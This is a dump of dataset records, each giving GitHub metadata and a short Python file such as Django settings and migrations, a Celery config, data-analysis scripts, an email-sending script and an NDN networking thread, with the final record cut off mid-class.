blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0d568e564026f66f38a7a55aeaa4e39b6c3b6cff
|
80ea4c1ce04ee8e0ecd85ee71f8bffdbcbd368aa
|
/iupick/settings/testing.py
|
12021d836718a468cf6d733409edc755763667f5
|
[
"MIT"
] |
permissive
|
Oswaldinho24k/geo-csv
|
659ad24f5e8bcecc869143a61e58b38260cc1901
|
0100435c5d5a5fd12133b376b305e8fa79ddb8f0
|
refs/heads/master
| 2020-03-15T21:20:34.095967
| 2018-05-06T15:45:34
| 2018-05-06T15:45:34
| 132,353,011
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 155
|
py
|
# -*- coding: utf-8 -*-
from .base import *
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
AUTH_SECRET_PREFIX = 'sk_test_'
|
[
"oswalfut_96@hotmail.com"
] |
oswalfut_96@hotmail.com
|
6dc0ac7d042b1950915b2898b7c5223a44ba9af5
|
86d884eb096ed599c6069e2844985aa6ec30cb6b
|
/finite_difference/diffusion_coefficient/analyse_AHL.py
|
90363c09ea189ea4f7c21ba98bc5b006d7a2c5cf
|
[] |
no_license
|
zcqsntr/synbiobrain
|
46e770471dcfbc5082f271c4e1e5d8b694155780
|
66758554774c087b8c19c6d50fca5ea733b607f4
|
refs/heads/master
| 2022-11-10T16:28:45.888929
| 2022-10-11T09:07:53
| 2022-10-11T09:07:53
| 183,600,800
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,098
|
py
|
import sys
import matplotlib.backends.backend_pdf
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
sys.path.append('/home/neythen/Desktop/Projects/synbiobrain/')
from diffusion_sim import *
os.environ['PYOPENCL_CTX'] = '0'
nx = 300
ny = 300
node_radius = 20/40
node_dim = np.array([10, 10])
grid_corners = np.array([[-10, 10], [-10, 10]])
grid = SynBioBrainFD(grid_corners, nx, ny, 'float32')
vertex_positions = np.array([grid.get_node_position(i) for i in range(grid.n_nodes)])
barriers = ['1', '0.8', '0.6', '0.4', '0.2', '0.15', '0.1', '0.05', '0.01']
all_cohesive_ts = []
for barrier in barriers:
print(barrier)
activated_ts = np.load('/home/neythen/Desktop/Projects/synbiobrain/finite_difference/results/diffusion_factor/'+ barrier +'_barrier/output/GFP_ts.npy')
cohesive_ts = count_cohesive_nodes_FD(activated_ts, vertex_positions, node_dim, node_radius, grid_corners)
all_cohesive_ts.append(cohesive_ts)
all_cohesive_ts = np.array(all_cohesive_ts)
np.save('all_cohesive_ts.npy', all_cohesive_ts)
|
[
"zcqsntr@ucl.ac.uk"
] |
zcqsntr@ucl.ac.uk
|
f6dc05455cd47ae55195c50ba74336f3c0fbbd8c
|
9a5505ebc6a4a9f7d710e1ef8ce488b578b63c6e
|
/pycon/sponsorship/migrations/0008_remove_obsolete_benefit_records.py
|
e8122e5fb061226ee878cdeaa3743c783bc26e75
|
[
"BSD-3-Clause"
] |
permissive
|
arpitjainn189/pycon
|
9dabbfd6119a1b2a957469d40e223d063bb91494
|
492c47820d6dc546e79c707180b3c7b3925e8e72
|
refs/heads/master
| 2022-12-23T15:53:53.365038
| 2020-10-01T09:57:08
| 2020-10-01T09:57:08
| 300,229,565
| 0
| 0
|
BSD-3-Clause
| 2020-10-01T09:54:30
| 2020-10-01T09:54:29
| null |
UTF-8
|
Python
| false
| false
| 1,390
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
OBSOLETE_BENEFITS = [
{'name': 'Company URL',
'type': 'simple',
},
{'name': 'Company Description',
'type': 'text',
},
{'name': 'Web logo',
'type': 'weblogo',
}
]
def forward(apps, schema_editor):
Benefit = apps.get_model('sponsorship', 'Benefit')
BenefitLevel = apps.get_model('sponsorship', 'BenefitLevel')
SponsorBenefit = apps.get_model('sponsorship', 'SponsorBenefit')
db_alias = schema_editor.connection.alias
names = [b['name'] for b in OBSOLETE_BENEFITS]
# Clean up other records that use these first
BenefitLevel.objects.using(db_alias).filter(benefit__name__in=names).delete()
SponsorBenefit.objects.using(db_alias).filter(benefit__name__in=names).delete()
# Now we can remove the Benefit records themselves
Benefit.objects.using(db_alias).filter(name__in=names).delete()
def back(apps, schema_editor):
Benefit = apps.get_model('sponsorship', 'Benefit')
db_alias = schema_editor.connection.alias
for ben in OBSOLETE_BENEFITS:
Benefit.objects.using(db_alias).get_or_create(**ben)
class Migration(migrations.Migration):
dependencies = [
('sponsorship', '0007_auto_20150721_1533'),
]
operations = [
migrations.RunPython(forward, back),
]
|
[
"dpoirier@caktusgroup.com"
] |
dpoirier@caktusgroup.com
|
f30face88618b2e53b4b5aed2c70c8cffcfda98a
|
e2b2d81d1ea5beeb79d498dd4962fb5ed40e4678
|
/settings.py
|
322bb0ae98666366fece731a9d367f8abb04e868
|
[] |
no_license
|
palewire/dorling-cartogram-example
|
ddd70d3c310d323f3c896a473d032ccf67da182c
|
4892546b9a97aa6de0c1f3f0fe6e130319ce8378
|
refs/heads/master
| 2021-01-19T20:16:26.152106
| 2011-10-04T04:26:30
| 2011-10-04T04:26:30
| 2,502,718
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,923
|
py
|
# Django settings for project project.
import os
ROOT_PATH = os.path.dirname(__file__)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'dorling', # Or path to database file if using sqlite3.
'USER': 'postgres', # Not used with sqlite3.
'PASSWORD': 'postgres', # Not used with sqlite3.
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '5432', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Los_Angeles'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = 'http://palewire.s3.amazonaws.com/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '5um6b5gjouo_#2ymj1+_&y&pfm6aje8+mpg5%#=z&=1q31awgl'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'project.urls'
TEMPLATE_DIRS = (
os.path.join(ROOT_PATH, 'templates'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.gis',
'us_states',
'dorling',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
[
"ben.welsh@gmail.com"
] |
ben.welsh@gmail.com
|
3f2965e0c1071535736a0f8cee0a336628ca67e0
|
1385cf00f550ad38378227f62c49bb0cd05e1b04
|
/leecode/easy/207/1365.py
|
18f68a18946e06d936942586dac1d72c48b110fa
|
[] |
no_license
|
liucheng2912/py
|
4a09652fa52a1f92e8d8dd1239f9c128248fc10e
|
d40f73450fa65b8dd4d59d8d92088382fc573d2a
|
refs/heads/master
| 2023-03-15T21:07:03.456017
| 2021-03-11T09:15:30
| 2021-03-11T09:15:30
| 334,900,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 275
|
py
|
'''
思路:
双重遍历
'''
def f(nums):
a=[]
for x in nums:
temp=0
nums1=nums[:]
nums1.remove(x)
for y in nums1:
if x>y:
temp+=1
a.append(temp)
return a
nums = [6,5,4,8]
print(f(nums))
|
[
"liucheng@fanruan.com"
] |
liucheng@fanruan.com
|
2bb29f3a8f5b1b7fbebbe190a039627e34f71d57
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_325/ch30_2019_08_26_19_33_38_456658.py
|
856f9fb13cced922caa07303d99b2963d8c3cf61
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 243
|
py
|
import math
def jaca(v, o):
d = (((v**2.0)*math.sin(2.0*o))/9.8)
if d < 98.0:
return ("Muito perto")
elif d >= 98.0 and d <= 102.0:
return ("Acertou!")
else:
return ("Muito longe")
print(jaca(5.0, 45.0))
|
[
"you@example.com"
] |
you@example.com
|
bd3c614d453ba44555d79e289a0d4d923e611a74
|
9dba277eeb0d5e9d2ac75e2e17ab5b5eda100612
|
/exercises/1901050013/d11/main.py
|
62fffbca9611008650d6ac289947ccf42f4a8d45
|
[] |
no_license
|
shen-huang/selfteaching-python-camp
|
e8410bfc06eca24ee2866c5d890fd063e9d4be89
|
459f90c9f09bd3a3df9e776fc64dfd64ac65f976
|
refs/heads/master
| 2022-05-02T05:39:08.932008
| 2022-03-17T07:56:30
| 2022-03-17T07:56:30
| 201,287,222
| 9
| 6
| null | 2019-08-08T15:34:26
| 2019-08-08T15:34:25
| null |
UTF-8
|
Python
| false
| false
| 718
|
py
|
import yagmail
import requests
import getpass
from pyquery import PyQuery
from mymodule.stats_word import stats_text_cn
response = requests.get('https://mp.weixin.qq.com/s/pLmuGoc4bZrMNl7MSoWgiA') # acquire the article link.
document = PyQuery(response.text)
content = document('#js_content').text() #acquire the article content.
result = str(stats_text_cn(content)) #convert the list type into string type.
sender = input('plese input your email address:')
password = getpass.getpass('please input your password:')
recipients = input('plese input the recipients:')
subject = input('please input the subject:')
yag = yagmail.SMTP(sender,password,'smtp.qq.com')
yag.send(to=recipients,subject=subject,contents=result)
|
[
"40155646+seven-tears@users.noreply.github.com"
] |
40155646+seven-tears@users.noreply.github.com
|
2db42dee1688750e9f9b5361e4af2c9f36d228c3
|
5785d7ed431b024dd910b642f10a6781df50e4aa
|
/revise-daily/june_2021/walmart/10_triplet_sum_to_zero.py
|
e4e1d155945f4f6d79319f6ba48f01df9e967c5b
|
[] |
no_license
|
kashyapa/interview-prep
|
45d77324446da34d99bf8efedb3544b367b5523e
|
7060c090c40602fb9c4778eace2078e1b51e235b
|
refs/heads/master
| 2023-07-28T13:12:49.515299
| 2021-09-06T14:33:25
| 2021-09-06T14:33:25
| 403,706,510
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 798
|
py
|
def triplet_sum_to_zero(nums, target):
def find_target_pair_sum(t, left):
first = left - 1
right = len(nums)-1
while left < right:
if nums[left] + nums[right] == t:
res.append((nums[first], nums[left], nums[right]))
left += 1
right -= 1
while left < right and nums[left] == nums[left-1]:
left += 1
while left < right and nums[right] == nums[right+1]:
right -= 1
if nums[left] + nums[right] > t:
right -= 1
else:
left+=1
nums.sort()
res = []
for i in range(len(nums)-1):
if i == 0 or nums[i] != nums[i-1]:
find_target_pair_sum(target-nums[i], i+1)
|
[
"schandra2@godaddy.com"
] |
schandra2@godaddy.com
|
537ff5660a06711e1738ebf1b6cfdb1f3c9ea47d
|
87bf8ea26f6c28bce82ccdd9515c68d6341bd8c5
|
/trading/celery.py
|
6b455e28d01b1dde8036483d661a75eddc8dd195
|
[] |
no_license
|
aisamuel/real-time-forex-api
|
e9ac21f28f77aadae526df9a275487737d8d1155
|
08b1d0d129659a3b8735b21d7195cb756fdd6b47
|
refs/heads/master
| 2022-04-06T08:13:51.749351
| 2020-03-04T12:12:55
| 2020-03-04T12:12:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 222
|
py
|
import os
from celery import Celery
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'trading.settings')
app = Celery('trading')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()
|
[
"charliescene512@gmail.com"
] |
charliescene512@gmail.com
|
53411dfa34e5dcffe4e75154fc53a3b3114f157b
|
11f4dd74872c73781a8975698e7cf1e3df2a40af
|
/Chapter 9 - Organizing Files/findLargeFile.py
|
dab52b3722813fce1035f9413997e88737ddd764
|
[] |
no_license
|
lonewolfcub/Automate-the-Boring-Stuff-with-Python
|
ca65e9fcbd61c94776ac1a0346b5372e975569db
|
da90ead498a0597ae5a4f88449a9774887c7d5e6
|
refs/heads/master
| 2021-01-18T17:03:17.600375
| 2017-03-31T05:58:56
| 2017-03-31T05:58:56
| 86,783,143
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 552
|
py
|
#! /usr/bin/env python3
import os
def findLargeFiles(folder):
# iterate over search folder
for dirpath, dirnames, filenames in os.walk(folder):
# check each file to see if over 100mb
for file in filenames:
filepath = os.path.join(dirpath, file)
filesize = os.path.getsize(filepath)
if filesize > 13107200:
print (filepath + ' ' + str(filesize) + ' bytes')
# define search folder
print('Please enter the folder you wish to search:')
folder = input()
findLargeFiles(folder)
|
[
"lonewolfcub020@gmail.com"
] |
lonewolfcub020@gmail.com
|
af6b3f137d875061e788546266ab073b1b555f47
|
80d50ea48e10674b1b7d3f583a1c4b7d0b01200f
|
/examples/v1/synthetics/DeletePrivateLocation.py
|
e1445b48a8b1ceaab7b068d50ef37b6e45fd3c5f
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] |
permissive
|
DataDog/datadog-api-client-python
|
3e01fa630278ad0b5c7005f08b7f61d07aa87345
|
392de360e7de659ee25e4a6753706820ca7c6a92
|
refs/heads/master
| 2023-09-01T20:32:37.718187
| 2023-09-01T14:42:04
| 2023-09-01T14:42:04
| 193,793,657
| 82
| 36
|
Apache-2.0
| 2023-09-14T18:22:39
| 2019-06-25T22:52:04
|
Python
|
UTF-8
|
Python
| false
| false
| 386
|
py
|
"""
Delete a private location returns "OK" response
"""
from datadog_api_client import ApiClient, Configuration
from datadog_api_client.v1.api.synthetics_api import SyntheticsApi
configuration = Configuration()
with ApiClient(configuration) as api_client:
api_instance = SyntheticsApi(api_client)
api_instance.delete_private_location(
location_id="location_id",
)
|
[
"noreply@github.com"
] |
DataDog.noreply@github.com
|
7af77bd8017df4a03b730d463efae17dd0d9ffb0
|
447914f0f7a6e1b432f6811aacb0f274fbdbe3c5
|
/Jerry_Padilla_Py2Assignments-master/assignments/practice_models/apps/ninjaDojo/migrations/0001_initial.py
|
af5ff3d138e5e38072d2a746df99076ec1ab3a08
|
[] |
no_license
|
jsterling23/Python_Prac
|
965ab83e6f34191a1ebbc2e3605f71ace07a0b6d
|
dc41030be125337099ddbc8af8e2598b844e11a4
|
refs/heads/master
| 2020-03-18T10:49:23.521218
| 2018-05-23T23:19:22
| 2018-05-23T23:19:22
| 134,635,256
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,186
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2018-02-20 21:52
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Dojo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('city', models.CharField(max_length=255)),
('state', models.CharField(max_length=2)),
],
),
migrations.CreateModel(
name='Ninja',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('dojo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ninjas', to='ninjaDojo.Dojo')),
],
),
]
|
[
"jerrypadilla23@gmail.com"
] |
jerrypadilla23@gmail.com
|
71b257d53cfa0b1ff1ea40c6dbceb81a4faab0c1
|
d9d7f841e1a7c53344000634320db78c5743eba5
|
/lib/python/make-csv.py
|
8d60b40f8633289728adc8229a567ec4aa777534
|
[] |
no_license
|
hellais/ooni-analyst
|
5bb7030734319ad0bafec267ec30a7c8d0696b03
|
7e81b812581e36e26951bbfa48fea770ec09c061
|
refs/heads/master
| 2020-03-22T10:05:37.383835
| 2018-07-09T11:07:10
| 2018-07-09T11:07:10
| 139,880,420
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,995
|
py
|
import os
import sys
import argparse
from datetime import datetime
import pandas as pd
import psycopg2
def query(q, params, pg_dsn):
# XXX this is useful for debugging
"""
import yaml
from sshtunnel import SSHTunnelForwarder
with open('private/secrets.yml') as in_file:
secrets = yaml.load(in_file)
with SSHTunnelForwarder(
('hkgmetadb.infra.ooni.io', 22),
ssh_username='art',
ssh_private_key=secrets['ssh_private_key_path'],
remote_bind_address=('localhost', 5432)
) as server:
conn = psycopg2.connect(
host='localhost',
port=server.local_bind_port,
user='shovel',
password=secrets['shovel_password'],
dbname='metadb')
return pd.read_sql_query(q, conn, params=params)
"""
conn = psycopg2.connect(pg_dsn)
return pd.read_sql_query(q, conn, params=params)
def make_csv(output_path, urls, probe_cc, start_date, end_date, pg_dsn):
countries = [probe_cc]
params = [start_date, end_date, probe_cc]
for url in urls:
params.append(url)
base_query = """SELECT measurement.test_runtime,
input.input,
measurement.measurement_start_time,
report.probe_cc,
report.probe_asn,
report.probe_ip,
report.report_id,
http_verdict.http_experiment_failure,
http_verdict.blocking
FROM measurement
JOIN input ON input.input_no = measurement.input_no
JOIN report ON report.report_no = measurement.report_no
JOIN http_verdict ON http_verdict.msm_no = measurement.msm_no
"""
where_clause = "WHERE ({}) AND ({}) AND ({})".format(
" measurement.measurement_start_time BETWEEN %s AND %s",
" OR ".join(["report.probe_cc = %s" for _ in countries]),
" OR ".join(["input = %s" for _ in urls]),
)
q = base_query + where_clause
print(q)
print(params)
res = query(q, params, pg_dsn)
print(res)
res.to_csv(output_path)
def parse_args():
p = argparse.ArgumentParser(description='make-csv: creates a csv file for the specified inputs')
p.add_argument('--output', metavar='PATH', help='Where to write to', required=True)
p.add_argument('--country', metavar='PROBE_CC', help='Country code to target', required=True)
p.add_argument('--start-date', metavar='START_DATE', help='Start date interval', required=True)
p.add_argument('--end-date', metavar='END_DATE', help='End date interval', required=True)
p.add_argument('--urls', metavar='URL', nargs='*', help='URLs to test')
p.add_argument('--postgres', metavar='DSN', help='libpq data source name')
## XXX add urls
opt = p.parse_args()
return opt
def main():
opt = parse_args()
make_csv(output_path=opt.output,
urls=opt.urls,
probe_cc=opt.country,
start_date=opt.start_date,
end_date=opt.end_date,
pg_dsn=opt.postgres)
print(opt.output)
if __name__ == "__main__":
main()
|
[
"arturo@filasto.net"
] |
arturo@filasto.net
|
b068a33104b190dfe987923899df18b4fb43123f
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_ports.py
|
0fffb49ed97cda99bbb0989d662e80ae11e7425e
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 214
|
py
|
#calss header
class _PORTS():
def __init__(self,):
self.name = "PORTS"
self.definitions = port
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['port']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
6afe8571e5efb5c4c6ebcec6460e3eff20f3c450
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2939/60688/289152.py
|
06318fcf6a295848bf438a55ad0e226977a27ba4
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,016
|
py
|
strings=input()
numslist = (strings.split(" "));
if "5 4" in strings:
print(numslist)
numslist=list(int(x) for x in numslist);
times=numslist[0];
delnums=numslist[1];
mynumlist=[1];
finalnums=[];
for i in range(times):
num=mynumlist.pop(0);
mynumlist.append(2*num+1)
mynumlist.append(4*num+5)
finalnums.append(num);
finalnums.extend(mynumlist)
finalnums=sorted(finalnums);
finalnums=finalnums[0:times]
finalnums=list(str(x) for x in finalnums);
first="".join(finalnums);
secondlist=list(first);
secondlist=list([int(x)for x in secondlist]);
#处理从N个数中取出N-M个数,为max,原顺序不变,贪心算法::总是从前向后扫描并删除l<r 中的l并且操作一次重新迭代!!
allnums=delnums;
while (allnums!=0):
for i in range(len(secondlist)-1):
if secondlist[i]<secondlist[i+1]:
secondlist.pop(i);
allnums-=1;
break
secondlist=[str(x)for x in secondlist];
res="".join(secondlist)
print(first)
print(res,end="")
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
d6101a03676385d1cab0549536ac13e065be7204
|
40043e5a5daf7817cbac766dfaede265a8b9a29c
|
/setup.py
|
d65b78460c756943bd495ead90e175877bb9f82c
|
[] |
no_license
|
juniuszhou/substrate-python-api
|
166246266aa9f96954125cbb600caf854774a6da
|
98d538aa3e13f57f02758656ffa7977463977e5a
|
refs/heads/master
| 2022-12-16T07:13:11.767383
| 2020-09-17T14:07:37
| 2020-09-17T14:07:37
| 197,921,346
| 6
| 3
| null | 2020-05-25T01:26:51
| 2019-07-20T11:29:55
|
Python
|
UTF-8
|
Python
| false
| false
| 748
|
py
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#############################################
# File Name: setup.py
# Author: junius
# Mail: junius.zhou@gmail.com
# Created Time: 2019-07-20 19:17:34
#############################################
from setuptools import setup, find_packages
setup(
name="substrate-python-api",
version="0.0.2",
keywords=("pip", "substrate", "api"),
description="python api for substrate",
long_description="python api for substrate",
license="MIT Licence",
url="https://github.com/juniuszhou/substrate-pyton-api",
author="junius",
author_email="junius.zhou@gmail.com",
packages=find_packages(),
include_package_data=True,
platforms="any",
install_requires=[]
)
|
[
"junius.zhou@gmail.com"
] |
junius.zhou@gmail.com
|
74c2347b9150e15dbbe69fe6dce4493a8258841f
|
b424c3262c9eacf8dd4230019eba7e05a9b95461
|
/.history/ndn_hello_sender_20200530012537.py
|
a9866ad3bbc9dcd7f10b5fa74fed00e9084ad214
|
[] |
no_license
|
leonerii/aer_tp
|
30e47f29bcda69512718a6279a7cad32e9a01b14
|
d8f46b188b5be9f315dd155ed147880ce7dce169
|
refs/heads/master
| 2022-09-30T03:27:24.375971
| 2020-06-04T14:23:16
| 2020-06-04T14:23:16
| 245,219,806
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,802
|
py
|
from threading import Thread, RLock
from time import sleep
from json import dumps
from uuid import uuid4
import socket
class HelloSender(Thread):
def __init__(self, lock, hello_interval, fib, cs, localhost, mcast_group, mcast_port):
Thread.__init__(self)
self.lock = lock
self.hello_interval = hello_interval
self.localhost = localhost
self.mcast_group = mcast_group
self.mcast_port = mcast_port
self.fib = fib # Forwarding Information Base
self.cs = cs # Content Store
def run(self):
while True:
try:
self.lock.acquire()
self.ndn_hello_sender()
except Exception as e:
print('Failed: {}'.format(e.with_traceback()))
finally:
self.lock.release()
sleep(self.hello_interval)
def ndn_hello_sender(self):
'''
Envia Messagem do tipo "HELLO" com informação em CS e constroi a FIB
'''
try:
client_sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Hello message to be sent
if self.cs:
csdata =
self.msg = {
"type": "HELLO",
#"source": self.localhost
"data": self.cs.keys()
}
for key, value in self.fib.items():
if value['next_hop'] == None:
self.msg[key] = value['timestamp']
client_sock.sendto(dumps(self.msg).encode('utf-8'), (self.mcast_group,self.mcast_port))
except socket.gaierror as socket_error:
print('Sending error: {}'.format(socket_error))
finally:
client_sock.close()
|
[
"aseie@Adrianos-MBP.lan"
] |
aseie@Adrianos-MBP.lan
|
10a74a89df0e005033f9a0040c90b46da278a520
|
e71b6d14fbdbc57c7234ca45a47329d7d02fc6f7
|
/flask_api/venv/lib/python3.7/site-packages/vsts/member_entitlement_management/v4_1/models/user_entitlement_operation_reference.py
|
0e8a8c4903319844a6245687d671b999ccabee76
|
[
"MIT"
] |
permissive
|
u-blavins/secret_sasquatch_society
|
c36993c738ab29a6a4879bfbeb78a5803f4f2a57
|
0214eadcdfa9b40254e331a6617c50b422212f4c
|
refs/heads/master
| 2020-08-14T00:39:52.948272
| 2020-01-22T13:54:58
| 2020-01-22T13:54:58
| 215,058,646
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,307
|
py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .operation_reference import OperationReference
class UserEntitlementOperationReference(OperationReference):
"""UserEntitlementOperationReference.
:param id: Unique identifier for the operation.
:type id: str
:param plugin_id: Unique identifier for the plugin.
:type plugin_id: str
:param status: The current status of the operation.
:type status: object
:param url: URL to get the full operation object.
:type url: str
:param completed: Operation completed with success or failure.
:type completed: bool
:param have_results_succeeded: True if all operations were successful.
:type have_results_succeeded: bool
:param results: List of results for each operation.
:type results: list of :class:`UserEntitlementOperationResult <member-entitlement-management.v4_1.models.UserEntitlementOperationResult>`
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'plugin_id': {'key': 'pluginId', 'type': 'str'},
'status': {'key': 'status', 'type': 'object'},
'url': {'key': 'url', 'type': 'str'},
'completed': {'key': 'completed', 'type': 'bool'},
'have_results_succeeded': {'key': 'haveResultsSucceeded', 'type': 'bool'},
'results': {'key': 'results', 'type': '[UserEntitlementOperationResult]'}
}
def __init__(self, id=None, plugin_id=None, status=None, url=None, completed=None, have_results_succeeded=None, results=None):
